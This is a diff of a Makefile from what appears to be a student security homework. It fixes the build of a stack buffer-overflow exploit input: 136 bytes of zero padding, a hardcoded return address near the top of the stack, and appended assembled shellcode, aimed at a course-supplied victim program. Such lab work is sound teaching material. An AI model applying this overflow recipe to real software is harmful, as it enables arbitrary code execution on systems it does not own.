--- a/Homework7/2018202133HPY/Makefile
+++ b/Homework7/2018202133HPY/Makefile
@@ -9,11 +9,12 @@ buffer_overflow_victim:
 
 buffer_overflow_shellcode:
 	nasm src/buffer_overflow_shellcode.s -o bin/buffer_overflow_shellcode
-	dd if=/dev/zero of=bin/buffer_overflow_input count=136
-	echo -ne "\x24\xe0\xff\xff\xff\x7f\x00\x00"  >> bin/buffer_overflow_input
+	dd if=/dev/zero of=bin/buffer_overflow_input count=136 bs=1
+	echo -ne "\x30\xe0\xff\xff\xff\x7f\x00\x00"  >> bin/buffer_overflow_input
 	cat bin/buffer_overflow_shellcode >> bin/buffer_overflow_input
 
 clean:
+	rm bin/*
 
 disassembly_shell_code:
 	objdump -m i386:x86-64:intel -b binary --adjust-vma=0x0 -D bin/buffer_overflow_shellcode
